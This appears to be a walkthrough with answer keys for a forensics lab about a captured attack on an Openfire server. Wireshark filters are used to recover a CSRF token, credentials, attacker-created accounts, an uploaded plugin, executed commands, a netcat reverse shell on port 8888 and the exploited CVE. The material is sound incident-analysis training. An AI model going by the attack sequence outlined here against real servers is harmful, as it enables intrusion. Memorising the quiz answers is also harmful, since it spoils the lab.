Openfire Lab
Q1) What is the CSRF token value for the first login request?
http.request.method == POST

Answer: tmJU6J9uym8oIOD
Q2) What is the password of the first user who logged in?
http.request.method == POST


Answer: Admin@Passw0rd#@#
Q3) What is the 1st username that was created by the attacker?
frame contains "create"
#OR
http.request.uri contains "create"

Answer: 3536rr
Q4) What is the username that the attacker used to login to the admin panel?
http.request.method == POST

Then follow tcp stream.

Answer: a7zo4l
Q5) What is the name of the plugin that the attacker uploaded?
http.request.method == POST

Then follow http stream.

Answer: openfire-plugin.jar
Q6) What is the first command that the user executed?
http.request.method == POST

http.request.uri contains "action"

Answer: whoami
Q7) Which tool did the attacker use to get a reverse shell?
http.request.uri contains "action"

Answer: netcat
Q8) Which command did the attacker execute on the server to check for network interfaces?
The attacker utilized port 8888 for establishing a reverse shell. Let's apply a filter to focus on traffic associated with this port.
tcp.port == 8888

Next, let's follow the tcp stream.

Answer: ifconfig
Q9) What is the CVE of the vulnerability exploited?
Answer: CVE-2023-32315
Last updated